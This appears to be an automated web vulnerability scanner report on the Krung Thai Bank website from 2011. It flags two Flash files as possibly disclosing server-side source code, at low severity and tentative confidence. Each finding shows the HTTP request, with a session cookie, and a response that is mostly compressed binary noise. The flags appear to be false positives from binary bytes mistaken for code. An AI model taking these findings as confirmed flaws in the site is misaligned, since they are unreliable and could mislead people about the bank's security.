l..v..YW..w.P.^r2. U..%9.-W.#..f.X.s;...Z.......(GS... .{.d."...?8,....o.sf..L...V.2.CNW..`R*........Y.~..E...6...)7*..N.K.N..VB/..i..m.H.....V..R.M.....9I.w.8......w...co.<w\..V.2....V.3=^u.%c...C.<2..%.le..oz,..Jxk3?..v..\R8^.....^....n....Z.mW.enh..............mu...EcN"r...%...R.....d/M................^$.V......>.....&.2q..i/.....(.....P..4.m&Se..u............u...........C.d.A..u't........-.\k...[.s.........}.%.......
...h.S...Ap.VIy..i.1.:dG...].A..j.......e.7uV.l:.U......-f>.ZSf7FA.$.~p)u.*e?.,A...j...L...r.A.6u.....~..<`5..}.V.8....P.f.....2..D
.&.T.<.6%.*.K......2-    d...AE..a&E...........Tc..$..=.zR...^6......l.#B...:1O...........x....<..n14..ap..#..(.%i.w..........PPS...p...+.$.|J@.hJ.:b.S..3........U..f..'h}........g....C!H...{Q..8.[    Y.....C...........2.%`dj..\@....o.M.....*.h..G......c...........vi..c.L. 4.. .y.&4.\.
....O..b.....    ._........k..|..V.......>M.)Q.)fF&.....(b....m\.    ...x........Q_wE..i;z....*.....y.......0./.j.H.U..u.6..+..9..7...c.........K.^....$S.L|.] "iP....{...S{.*.....F...}..F.....O..~...vn^....v.......JA...-......$....e|....9.Cn...........mH ....).+-...O..h...hT.......F3fK.*PD(..uI..b2...Q....}.....I....$...?....r.o..=............]..k...Q.....}&......]r/,T......... k.    .H.#';...."O..H..%.O.......&.w....J..N..X..aw.........d....p.1r...$..M..m...../1....\.0.... -}f.[.*Q....eW..Q.3.A..q.Y9.t...4...*....X.a2...YTgr...7g>f..r...X.....
...<s. .i....p..3.+.......Bi..G......    ..9.o...."5.k.h...~b;r..-......=..g.~_.(......6-....-zV.....H......0h#....f...x.@Z.'=.x...s...P}..h.s...U    _.B<Q    .(Y.H_.`D.............].x...!.0.;(...M;F...t...2...+}.....No<^..+.@......&..    ;.7...O...i.......%....wv%.f......9u...;U......b'v/..q.{iJ..u....;._]5..../d..o....V[...=\...G.$.5...8..D.../Y........9 ..i.N3o..r.:.4.T..x.....P....R">/..Y.H..T......n............y.t?.`..l.*.Z8.......}RA..o...i..
f....Tb.....5K*&L..!..@.u0..O.,...UU.$...rW".y.H...j.2c..0..._..?.(.$..<..c.vmP.v-'..np.h.?.    ....v.="....@X.`..t7    ..u ... .:(Jf..'.-..4Y.'....h..;.........[.#..35..>....O..Q...."..D!.`,D..f...I....'..).../.Z...YK..!.K.'.......6x.F|...:i;n.....0.h{t...(....-...h..2.w.m... 5......j...U.../.D.X..T..9..0Q0...KDo..o1.b`.i.A.4B#...7/t..;J.......m..-.f....m...8C..LJ..z..1......8...Opz6`..z.;.../...&......M.....0.....c.Cg.T.....y|I...._.....ure.O....m.X.......h/.l.Q..VpM.`a...5Q....UP...._'R....+m..d....    3.O.KvJ.}.....!.....?...L0.dN
=....9g.....;.Q.a/...).V..V}CK./IX&.Y2.U.?b....ei2.6.N...:..tQJ.M2}./[..G...".):A/..y..,m..w5.......K{?1.....ZQ....@.\qZ..2.3..Qf.v............_.....cT..Zuw-B.........rdf.....4&.*....>....)..;........[.-.fy.7{..]I.'....0....b.h%...)...... ..V...P.s2..w    ....xBF....[f.......?K..p.
.......:o.....J..F..9.rI?..9......h.L...]q.Cq..UtD....SI....x?.hl=.<..Cc.c..N".D.=........+U.n....h..f.".Sg...d..>..U3...W._BXe.    G..u..#.......@.w..m?aKb.oW..o..i....:.,..]z...Im.....d-....~. ...Q.Cw,...i..a....7.g..?...i.../...\..O.f.a...>.j..g.i.[..QE]....{.X.eO..z..ne......N=9=.5W.;.'.r....N.D.I.....iK}.....$m:K)...tm*.GC..P!.-.....N...S............Q.....M..&.J. 3;....l|.9....6....]...a....H...&........9/.p{q#...Nx>......#.    ....0.[TF..    c!.....Ul...v......*S".."....7U........t....b1S.a$.of.^.'..a../.^whU.;...M....".;|...*..........E...)|:.o%..j.R.._..I2....PZg@+]......a kC..,..z...E<,....@..R.l#.wU...?5.....<.-".Xq.0....=.........T.{x\...L.x.+].J.o.,.D...<.-......cYyx^D.lF.:Is..m..........B...../...t.V......u....k....    gd.[.......~.z.k|.D.M...&I....G.......g......c8B^-..3.....G]*.z....s......q.<..Rj......r..).....O }.p.....Jr({.X.@t^..Dc.T5..!-...<.&...:%V.%.d.(..H&.j.R..gl}z...xD.. ..+..-...}I#8..{...q._.:.<..?.{..B=,r.MO-.M<..A....6n;:....M.<YN....>W...,.$..+{.W.s.>.H....0qi5.U(........ q.....!. 3...NO......^h.{....x_..:.3...."..Z..f.Pqs.S..&..P...%.....    B..............=..>.IO.DA......r...=&.`.........    .n...+.*.,.R..2~9...O.3nBl...d._.T..,m.d..*..NhM.#.n.e    ~..6.Ui~....K.(...    ..%..U.t.\..........Rd'f?....'.....N.1..?.dw.)..p......... .,.P(.....".5.l_2..../.v.f8.        .>8..s.....u..k.I).9...._..?.7..N...%..WG.....-1....w...l.N9..vI.0..MrPK ....q...;.U....X!.&:'.....0....g.].......~.qB.gh.|x.........0.....;E.OpO....5..E.y<..k..E...|>.......@TE-.q. ..wo.A{..ffc)Q.S1..`P$=.qL..].~..@c. .*7-B.>)""b.?-zD...F1 S.z.=....7!=.N.m.,{....:b..P....V.uI<>.WFD.3...!k.T.>..W...U..Z]f.cu.S.<....h/.....9,.=....-.qM.....CR..<.D...@z.y.....P..X5.. dB.j....|s.te.4<".8...cG.......6.#.N.a.Ssp2c.......3...C...mNs.K......o(..?.\......P.!.s=.5......[...g..43....e&..]j.3.$7.Gi.m.V<.p.>h    3.ln.f`.!l.j.P^S.lh.))........v*.MRy..t6K..f....v...'t...kU2`...v}V..%.}....(.^.~4..1.cI...YF.=.N.....W4D*.BnRj&.$.TI.gZ....R.+M..QT..N.+.s..;....}u.    u...z.<.P\..<.U.M2|...p2p.....Y....).
...0...|@J...<....II..h..}..>...Ib %....?b.5KG..@..H\h.i.Zz....Pu.'.....V_....=)./.....1\.o.....?.@.A.}.~{&...|R.Y..k. ..}..U..9....
...ft.#_..$s...-........c.....r.V..-..W.R..9...2tKe.....4.C..[7.K.<.9~..[d7.....~.[|3
........q......%>
....}hbv........#......Jq...c.@...'].2:'+e..3..*}.....x.Jg.ZWH............LW..UU'a.i.#.y......Q+....).i..A..H..-......sa.X#.0u..d..S!.b.a..,....K......zo.....3.C..h.7X.....n..q.I.
.w.....S<...M..{...
...[SNIP]...

18.3. http://www.ktb.co.th/flash/c3.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/c3.swf

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /flash/c3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:36 GMT
Content-length: 62176
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:24 GMT
Etag: "f2e0-4c723a10"
Accept-ranges: bytes

CWS    K...x.|.u@S...|.........c.t.#F.ll4.H#]...........""..HK...(b.;..x..?.yv.<...9...6...s..w.....a.h.....].......-.[..ut.....i......._.
..Ci7.....3...N..s?m..o    ....K...
9...'DGO....g`.10.32....L..@
...[SNIP]...
.*....U!..........T..l.....$0...#.$333

..$.N(T?
....O.(..G'....2qDS~......:....'..p.._O.J6..`-....\...J...u.2*..].842%\Y3.s.....Vk..O.....iliO9z/,U..g.V7......o......{....r..y...$.'.SD.;.    _d{....r....<?s...R..lw.k...    ...;.c.....@..}...\.n...v=_.gby.....&.y.^.i...8....7..A.[...[?.|....j...:.....x..../#`w.../2.60......bq8.....S..^.J.*m...ID..1.DMj..x..n@.....=.d?........g,.....3....-O.U(..=/j\.V.u.....*.........n.p7.`8pP!.}>M.XzV......Daz.'...c=..+.Ibp.K.........|n..Q.....]..>k..\Of..ES..f#.............elP.j.).S...M..........Yzz4!.._.=!0H%..,^....6t....A(.....{.`..#.(5 ..q.P.x...]4.-.[@j..C..GP5..M..M...>..o......e......./..I..."m..J..K;@D[Ri.....X1..wkh.J...Y..0U0...3......%    .l|A~<.........g~...".......8....d.27h|...<.%.Q..6....)...S5cc..N..0.J_..wZ.....tue|.z_o....Yk.....:....*,...{.==.....2..a.U.#.my    ..^..f.....#.<l.........F.2w:......e.)+0...s...*.#..i.8...j5.r.....
.t.o..x.,...w......B.G..\....../....{.......M.mT2.3n....}.>|h....X...r.#..r.."..e...M.}.I..~.^_Y....&f.@. FX....y....{....Er.......@9...d.+.........]-....>..EE,?.z.2.}..f.6|.T..=K.ev...dX..9H.....Z........iL.v.v.7...Z.6...X....,{..vN..l.L.....v.U...    ....yi.    ..........JT.)=../....wM{...P{av......r.........y.g...P.'.N.{.Q.%3d.2......i..G........:.D./......b...].......    `N...Xz..Y4"*.....j...z)1.9.N6qm.b.]....w....=.`.47...sz4.&.5.f..{...`...].v...0...@..`T.~M.....J$..ld..77..fq[....m....*UX2...r..w...}...'+.El...'.p/..~..<w(X....*....m<t..&..)z....gG.'yH..C7....../C...&..>....tI~d..J`[..B.....nU....y.?.^.I~..*../..........d..G............&.Z..0}...q+g......R....2jSm^...@...$..".._.y5Lm..~..c.R.........E..\....;...yn.E..B.r8:<M1B..u.m...I<....v.Uw...\j...sn...R-....    da.<....I..N2.".........=._t......Y...O.qi..Q....zK.....b.........^........z.(j19.`}R..`.h....E..V.m^...._..o`......e.....q..Ch.d.......?._.H...G
K    ...._...P...0./...o...).6.....    .@..C.uZb...
.jk..ST....13)..Q{{....!....v!.G.NG.:..k...".g.d-x*gT.`.r,.p0h.Ti...x...5=,...U.x.KR.X.5......=..E3.........._.......z..x=.n^.l....{.4...i.B..o....{...zl....3.K#.....>.......#>.\?4.S.QW.:o.i....dfgn...1.=..|.|R].~.)6kjB....Qa&.P.%.x.qI.7P;....t..\r....z..#K".%.....YY~O...E..).q^r...]t..s.....M...O....}...e.X[I^....W.|..`VW/.,..i.'0.....Wy+?>
......UB.7..=.........2.jm....."...p......6..v...[.,......)a.S.4.:..T.....
.....<...;`X.4..w...c.La..z.....e..d..    7.&.%......2W.t.....9^..Vk.H.m..$....,.1.v.....~...v.c...#..&>
...[SNIP]...
<q..":.K..C..5|..}._/...3.+....(.....b....V.eJ.Yi2-..KI.....3r.    q........I#b.X,}..~......B9!.M.^1..]......lV .I....%E..W.^q......^6.-mo..Q$..*.<?0!x...H.g.b....-...E_.}.\.|..*;...b....o.WFTt.....'.4.['..q.J"..^E=..1...~..~...y...9M-.].O.;...JX_.UF.X..........Y..w.....w.>z...xq)....i.U.a..C.M.V...:...F.x...q.s..B....G./%..K....]~.+W.s.7`..p+.K{.h..X.[.g_.B.{...`{.F..zb....7m.....J.^..e>..........w>F.$...3.2.6.[~.......v.~........M..nJ.cEeM..........Q...V..:...M.f..zb?~...........3.0.o.n Sj]6...F..(Y......[..SN3..R..{e..zk.w.~...>.[...6.d.H2......s3.+."....*.A_.<\gF.......[...p..Oz.[....1lI.[./.}6.zOm=7.].W.Pr..'#.In.A..w.G..=y...;1RB.....G...>.:{a.....PL.!>...@M;..C.A6`....8..}....::#}.w.gRV.Y. .;I...$RB...j........Py.............g....1Q.2.\.8+..FaH..a...2A:Nfz..2....T.3.....<...F],...!.....W........|1....=s...G..................+..B..6.......t    [..!..D.-........;?_....)m?....s5.%...w.\...o..#V...hAL.t.5>.J..-..,.b...d.v.,C..em.+.&d.n...m8...v~..]'..G....RY+...R.9.,
.=.....+.=..vO.s....Kz..).?Y.Y&.....Hv._..|.i..."...j([y\..Ma:o.......c.oa[I..s.u...$lc......o.n    5..f..2.=;<{.S....x..Ei.;..8.b..z{......P7O.?`wGA.aQM..K...T...?...C.{.5.|.....t.P@.. `.].tB.(..1..CW@.*....
!.)..*UH..;*.s...9..{.y....d.|..5.....3+....N6..!d!.R2t.1..W.=........ne\p.Y....K...F......1......y.?..|..."...C.f>...._.\...\s.|..\..%.gm..u.)6%.".....b.}.2.fdh...|.z.WSW..h..m...l..1..d.qV..l..E.d.i.?]..s...*...MOP....z..@B.c    !A.......Z..n.f..b....}.
G.>..T..#.kY7.7K..BEy....|.G........Z........q.j.6~Q..d....9.~...&.e._*L..{..w.......4&k.\/#ST.w.8G.....=..H8 E...n..f).s%J.2.>%. .$E..h..X...M...?.....Z..W.y.y.tL.DOov...D    ......~..>.=.B.n....t....[E<e.. <..+....B..w....2x3Kk...m....y.2G......a/.7.V6..q.....S.z..|.......~.tc31..YI.qh.........4...y`."'...ePL........p9..../...`. W.q$N.3l=..[e.W.."V...GMt.%.g..H.Z..:....6?P'.<..h.
....4tu.7...b.8...@@....f.RS:.].......25......I...TA..Iu.T5.....Lb......@.\
....y..e0[D.}*..?.F.i6.^......w..J6.kF;f.XZ.9..
.;...`.....>^..b.!U.K..I...9.Qy..+...DoI...S.r...*..qAM....z.\V}..Lb.....e..V.B.....~N.1vq1.uB.....Z`C..;..9.tD"1M...99
.W...f..}.3.
d..DdH..9........6~~k.{...VR4.:R...d.(.l....q...6.O'..m.^).......P
vXw.6rCg%}......l4..7.p.n.e+.....at.+\...;h...6\T.K....n. ....<....D...N....E...Q..    .O=..U.>...8fRI&.U.jE1T.......k<)Tz..s)*..E(..Kua....]......{.By.P.9    0...8.z..YZF......"..x.....*..q..P.q...\.............?g.x..y)9F(.u..pD.{...KQ.k.p.    ....0.....r....
{S#TD3.C.R...y8..Z...3.....Y..*....`.Z9..M..C........(.%,.4..)...<8/.c...;.pj=)..c..upf%........G.j...=Y..f.h2..1\T.0...*.........Q..|.!...x#y..8.7..\...
..q......"...V..Y...Lgty.....g...;...S.\.Zi-.})yE..S<.5..gdKs...~...@{#}..].y".)7
me+Hn..$:~.G..q...r..k.B,.I..~........Dz.|..56efrT."..k.lCw.;c.............H.    .l...d.#"..@.....QAk}..7..~Z..wM ...(....o.(/QU...b.."-z.2..i*.N'T.<Q.j,...3K..4..[l.T-U..'....x72..reJ...j,.....l0_...O..n..D} .}......e..@.(b....rw@..R|...8*(....s.#0.q....F.[..B...K....G.G.3bo....g9&..6.'|.Hrh..\.(3.OF.$..^2.7.b{...b.'2.]..Q..#.)...g.I.RSJ....H.......].Y...."....n....x;a..U...H.3...G.~....T%F.*.c}x...(.0T..?C.>7X7....?.l6+...Sz......`..X.....q_L.)..\..*.t...;K!8.I......c.e.La....~.k.).*.-...-aZ.......#....4.O....0.........g!.#..#...    .,<...}r....=......<S..~.%B.! 1.D.....1.O.....Q.0G..Y....0..U.^.......C....r.t..).zP.]]I.[B...X.(Z.\@..iw..e,..m...bt...&.....`9k....[...
#....Ff.....:.|.@KW.V$...`..1.'\.9.Y.....h+..\._=.;K....|........J+....6e.......W@m=j..1_.ALz.'
g... ..}iM....G4....M..~Yp.d....G.C........Su....p.......7J.o.cF.%.p...1..<.........i...s@.-..i.D..;k..i...G.......b.4..,....r...l._..y.&a..6..{...K.K.    z97}Os.........o..A...nJI...r....^+.1.......~Q&M..1.?.d).0..t.\....._.U-]m......hf2...k....L....h...`.u...&g.....'...C.....b......U.......).#......B\.C...E...(........V#e.c.....2..=...^&...U...?>
H..f'..;A....C.#....;.....5C...;on....?k...............ILi4....I........4S....n$>
...[SNIP]...
......i...r"Z./%..o5..s.......2&'....=.G....v.fe..K8'...h.=..;t..d........m....g..N{.H..70M:?.....Awf.....=....Y..6.......N
X+..-..._BmC.....I..+.....F.4.K./2[LV.a1_Eo....9...vi....#|q....m....P(.d....<%..Y:...{r.........I..?.$..IX...........lt.l4....E.0.]...v.{..Zrv"..!..........7...?c..$ZO....LdBb~...3...{...xD..p.@T....p?eU#.}.x,....g.w
..%....7..-.......-;.j....W.W...#..S$......>().......s.T..........Rc..#..W..VRI."...d...w..kk...AEk...R..:.?...H....A....H........f..q.xP...-D..f..WL/.. .......
.....enC.h...t...r~R@.Q....:...pT.I.G2.......q...}f.k5..^...k9.`..,.z.p...HF.xa...{.."].F......S.Q8.K,.d._.....
B....O.l....{.>..c..Zz..
..j[rI..}.;=l.......a.FSn........?!M.frc.{...JG]..2.9..+.g...r}#....i.P.3.e.p.r.'.d.^.T.6a.7..M.....1.]....H...6...~.W.,<.BW|....jh.m........?.+....,.v...].....=.yYx...(F6.....@7..V...............m.......b.*..=.ZA.no.C..N.J.).e.....m....u5\..=.;......S..s./.m....Q......}[....d...+..)..ZN..z.._o.
F>baT$.SvC.]I.+^.6...B...
.5)T=!O.gN|....(.0P0.#.....W........{Dq.H...(..P.`..zqx.Y......#6E..k.    .....z.xA..w.($...2..=JE....x......AA..oV.......j.(.:;....>..~St.~..Q!c.\...FqA....'`........*T.......F......S"..[....W.....2.L..B.j..-.......:.)..y......].sh#...p.e..k=k..{."...x.B....r.l..5=........'..a..
.].j.ei.....HZSf..G.......w9.H."..'..E..i..{.u4.....t8.~.......G........#m|*.X......T5.k..m. ...2......Y..Nw.6;z. ..$..>s..C-.....>.r....9vn...VY..Z.O.........."..;`.%>
.8y}....|.....\..].B...s..$.I25....;.H...S.Lk...y...u.u.............@...ER..d..}g,.z..B|......q.l.......... b..qZ..=o....o....@..9.....vr..*KgMM...x.).S....C6.O.`)gx..k.x....*..T.B?K..s...."....C..J..
...[SNIP]...

18.4. http://www.ktb.co.th/flash/d2.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/d2.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /flash/d2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:16 GMT
Content-length: 73420
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:28 GMT
Etag: "11ecc-4c723a14"
Accept-ranges: bytes

CWS    .)..x...eT\].%Z..%8..T.......
..`!.K .....P.C..4H..
'.. A;...v...w.~.z.5..Qs.Sg.qv...Y..@...{.`..@..xK..kr.OOOR........X....@...V.........m.{.t........}....
p..{...:......@A...?...9.&:.6&::.&.>.
...[SNIP]...
<W....M;..].....wG6.{..].....ah<?.X.N..*[8
Z|1.J.=.. 1..WY2&.w..8eP.JJ..s...1
8.!.c...k....#.....~?.........U.......#....Iz.~....q-8#..gA.^.]...i.L...;C#.h`.....e:h.&...F...~G.....:.......;n..]4.U..[/.F..6^x.a.0...SkO.t...2....cEH.:.....[..!.t....)&...[A.,..    b7.........8.ANqLuq.Gn._K..Y../..2..............T..j,...>.........=..f......n7...........8...G.j9-....7.t..i.8.<..V.{.}..
....F.........+.UY..Fh.....7.Soj.hu.O..EC...}...m.%N....5.....-.7.    .|]..wy..,N....v....5I".."=S.V./.P.[......6>:k..2....2mkj4...5....~..jB...9...#e....,xJ..
..........di2=....X...B.26
I..O....b_.............$../i....8.A.ge.'.-...{.    G....4l...B.h.#...
o....,.5.l..<.c...5}..O.K.Y^....E..S.kc...q.......k..#<&@......C.........&.\..,.g.Q..K.../.q {9\
..S..........+....C..?.'X..N...?y....._z....g.gf).).|h.K...s...N...4.:.Q......:{.:!...;..u.(E.+.....Q......
.........A.yfh.J.v...SaB.z......Vb5w!>?t|.$@.8...L.:yQ..?..2.>.............m@.I."..^..#....k...c...........".i.C...........x-.v...)..c..' ~p'.?.#...j....ZB....*<..C..-...`..U;8...g........&....Lh..(.&......;y7...\...Y3.....{.....q....[.......>.g1.t'S_.9...s.;a.u...c.Q.E.f.8.7.....>......ip6..H....o.{.F?..D.Hcma..?.Th).D.JZ..."O.CNe...%f.>....M2..?TP...l.........gh%dM.dC._4.36.N.SQ.lKF...s......%...b...E..g.$.M.s.......7..G.LoX.......e-,.=....AX.U....... {....{.Rg..n.=..%c..5.........-..).
..2.u@..S..1I.(..Y..|..&G......>.....Tg@..C?.@.#b..q..pe..3xC.9X%.....&N>J.......F..+.N~............3'.4....n*.UvC.O&...9a.0..........$<.)..V.....&..E..8..M.dV.y....y...S.g.    .....C.b<trT.....nc,.S...c...o4.5c.H`.d...O8-_n.......k........K......Q...
.h..{H....?..H.t......+.M.v.Y.Y."P..a*.r.    ..2@.[.b..J....t.    .H.^F.T.uu$....>e.v....M\..'.."%............G.L:k_.fb...u....}....._^...Qip.?...]..CO..m..A..D.a._@U.p......."x1.;..[.R.....4.....e].!.\}..]....2.._.4..T0[....Y....    ..RG.o..L..Ys5'`.O.e..HX..^*0ow\...e........xyJ.sb%...c..S.."m......N...5.LN.1..0.l.w$..'l}.@.Ng..xS.p...^.c..#........;.yu....s!.......I...|...k...vsYjzC......S.~...n.z.<.x..oQ..Q!..R....(........G.
...TK    .T..........|y.....L?C;VC.....+.%...,1.%(..HYW.....!.....-..@I.W...fx.`.v..#m........kC.... ..rw.."........)|Q.=
g:..3...w..."+.>c6...^.{...*.I.^Cp..Prh..u..<.U,L.1.J.*.......p....+F.="a...O.n8.*..
..xX$.."..?.....Y.wm..............B..KLe..    *.I..$]!2f(Ye(..2....|H..(.....m.tw3..........mI..;..7.=..%........AN.^....>.....vQ.b.).....V........~..9..s......
.&.vY*3<.......F..."0....p.R....!:..dk'.c.n2..y.2../`j...N&Zc...........I..J.U....T...j.......x...l^W.m{......80%.bgk.Y...?.'H.H}A_N...z.....?26(..p.pz...-%M(T/.GKL...O.(.....|..@... ....`.....Y.?e...M.r...Q.:.>.....ha...?..n#.v......;~..:. .....x.l.o'.4.G..%.4...........G.`.?.n.+./P.XS.....T>b.n6.....n!...0}5-P-.$Hc,......)=9.....tw...V......[.{.me.S...y.._...D...v&...3. ..[....E.. _.
f...N."..4...S.C.{=.U....Wp..].U.....g[..;.....z...?.........:....m..X.0.4.....p#PF...)..Q#...T.f.g...W...n.x..X..!...q....7..<.5aA-*.i)......._z....uA.....'.....z..0..F.F..8....>9....j...a.    ..H..8R7.-y..t.|R.....e!(.Dj.A....j...P=...K.. g......\ ...(..z*.....*....x.k.B%.H.T..:.#!..:-4CZ....X..YL...    3..8k.....X.L.~..Fg.......1?....2{.,..d.=d.t....?..^2..#K.E.p.n....$..N.8.!.....9. ...v...~...\..../...g.5..=L\{.....=......#*96..Eo...c6iF.`+$'.....).9....{.........[9.I^....<h@{n.....YCq.Ws....<.....~..3..`..6....>E...6t-....q.Cm.$.+    ......w-x8.h.,g$.8..X.iA    .s..B..F..I.Wk..N......../..0.. *:.,....o..A...".!...2.F...Z.....Ol.N._.,.xi.A....u..9;}m.U..)zn...........O_...6..V3w.5,p..Y.4...p|\.Y.D.HUc..d..X..+C....>.A......j...:....N.s..........<%(,.@1s........B.4...!f.:..^...p..M..x.COs.5....W&...g..fU_.{7..Q...@.Mf....@.$..]..h...a..:..)...;f.5..J-;..x........>..^......G..Ft.IZ$.*H..........m.y\....q..2.n*...|.Y....f....>u....K[..y.0..E......]).b!Qy...':p.........%P~....<F
5..i.Ek.z.;7..w/...-..l.k..<...X-.'......R".U.6.-..rxUV..S;....h.*.4.....H.l..{.v..r.<J......}.....PB.i_....F....?....o).....v[..<....K.^..&.*d.........o.T....:(
.v ..N3.7...b.M.s.....i.t..7...w3..-..I.-P...2..3.~.........+....!..31.y.....,- y.4}..iuoQ..3..s.U..G|.e...1.q.&.e...b....g..BxG$...3.P.....G..._..b....@?..0.*
..1..9.
S=..../............t(..DY....G.....i...{rS]..9.D.Be.k&..9...3........T.;Xh.?.C..s.B....J......z..:.y...[G.7.xDJ..H.PB...[.W@dZ.....m
{......Xk...Vd.....caS...e...O...ev.......+22s2$..k...)."._...#.62.O.a..=Y....g...[.DJ).&...<..?WrZvd%?...\.~.1..:.2/q...}...Q;..1\..n..7f...+>..,.M.TG\.Y...T.%|.>!.=..s].y.h.o.........Yy.\....']....0qvts......R7/S...].,.....OK...BR.../5....N.|b...2...V....K.Mk..Yx........y.d6.5o..............z.    ..."...?..3..D...\|...(l
.X....m_.a.wI...L..<...P;X.......5.a7.Bf.`.qQD.........,...P..}.6.G......~..U.....TA.....J`+.,
.S.<...{FZU....I..O..X...b.K..s=.t._fPR.h<h"2!..............0...........5[a.+.{.f_......J.P.....z4..........yH.l..a~..p.'..`g4_..7 .p.....Md>h.+K..G[..s...~..%.6_r_g.]..Xp~....f..s........-..!(..PB..W...!e.i-.f*..F....H|.j......w.f....G.......s.%+@Q)a....Ye..w.a..q..4h.Z).A.|.._.t.N.f...Q..J`.w..<.`m.F.P.y.V2.|<..GS...[l.69'..e....o....i.f..B....!_....L...j.O.e...a...i....X5........L
7.^,n..U.....+2.=..^^y\.#..........m,........
w.w.\AG&.\Wd/.&.SG8...y...b....].....^.._..{.bpY....w|e.9..(34...Q...mDL..[K.P..0...s.o.S.....uM.'..7..o.U"e.<....2Z....@.F..?..C..^G."%G...{...D..d..ZI~.g...v...}w5.j.Q5..:..n....b...5.>.....C....'...,.Q..d.4.%.........'_..ft...;S$..".O._...q...[..........1-........Iw.b...;.x#.k.8....vi>.7.......    .....zz.Rq."..N..az.]J..|?.......Yr.U.]...<.q..\.&.X.<;m....~...........*3,...:.kdsU.......7~...X.F..R..k.{....tl.zA[..&m....R.jE.t..DP.~...7...e...`S.|Z.k............x..L..-b..A..@.G....D.....z.X8F?...;..,.#M.8O,..|.~K...a.]y...../nw
................]sM._..9V...'.l.............5...........JX6....$......<.Wv."......pqUB.sI[..~...N.......3;.\R.........b.....e...r.....QT.b}j..Z...WF....r..A...".B2.8XN.xp".=`...).I.......paw.......f...Y.<..6.{V....&M...$......3b.v.ivy..h,.....\bGQ._.....m..S..M...lt.)...\.....?.V.&Z...V........fS.RI.K.5_.6..J.>`.....:..I]S..yd.4i...7.n}.m$..M....F.Z....v.#...^;.c&.,.r.i....\...i.....M..'......E..p...y@k%4.;.....Hk.`2OL... ....,...........E.5.qE.z<.....K4.......Q8....tQ.p..../!...,..8.W.......V..9.........[6Vm]V...`HW5e.a..Z.n.4.c.
h.b.b8K.N..K_..C3."...Z..pE...R8Wa..y.#.........xJ6.Q........]...f.M.#c.BV~A...%8.b.F....)l`.E_#............ 8...ji>....>..3....]....~5..2'.(.{..@v.....+..J.....bOp.Wx..-3dW..Z].......K...,W..pr...:..3...[Z.......k}..3.>.op............;.    ..9Jw.ch.Yk\....|>.T.K..>..(]....u9..d.......H..4.^.....5..K.5P(.JE......Xiy./...E.FN..0........9........N..,./p...G(.S..h..n89V...!...)?/..ua.I..z....X..E2.y.....3q.4...4|.$G.{....y-V.;.....#.!.{qi%....".....8..j..4....lb....wC....../.Leg....e..2...=~.4.|<..........1...W\...Fx`....^A.sVZ&...vM..Rw...>CK.Ez....S...r+.?}C..-........b..>....
"j......{..Z...hom\.O.'..........HSH{^...e.f........}.
.P.a./...?....!.k.i..,.C.?.{...C.1..).z.......1.qd.f.&h.$....PC.FkS..).4"1....(..;.
4v(.s.....SS...|r.QJp9..w.w..S..i@Tq.W..L.."U
.'.M%}......Cl.*......$l.    R..rk[.$@<...D.....B.8....0...{..|..ze.0..K..4.s..).. .[u;....A}.....K...B.=.!.....5.O.hz*.@,.z.?d.^`...~`...v(....%..).o..w.Z.;...b..l2..@Z..$%>2..H..E.i.f ......?...}..S<.    =..|h......ZRg....s...f..rS.g#.J.U'.%.MZo...v.l.Q...J[....K....;A..Q
..W.`...J...K9...    ...&.W}.F.l.C.|...e.d^cw ...bb    .\...`w)K.n.l#....HM)/.h.@2q0&..........5..>....{.....xR5\.J..x....
.=...{5jzfU.....eb.....-.......D.H.Uf...mXd.......R..045..TI..~.....'.Ee.i.............>;...)..:....
N_..O M.EM>..;.......I    NH..#.s..1..b....j..\...R.Z.. ...~..-...n'... .......1\.A..Hv....Fz......F..._....+....vZ..fP......q.]....s..    T...x.....o!5.z..XwG3.7.....}
.'.~<....$9..4..;jqfc._..1tO...PY`..K..._ .v.LY..h.....o.gqy5Z.....s.X....    ...+i.q...6.WY4>..W..O....x.z.-..5.O..."..%..I03_&E....%,W=.Q..%0..)v..M...d.w..h.....M)ul....@J......ht>....    .7l....QA._..-5o.....;?|1N..3/j......9>.:a3D.`.e.n5.Q..Qd..,.>..+D.Z<.U.,.....jn......`.. .&#9U.M.|....y|._;...v..i...^.g.xb.u.)......    5...%5.......I./....#...S.0..(    ="+e.}.A4c..Z.....c...
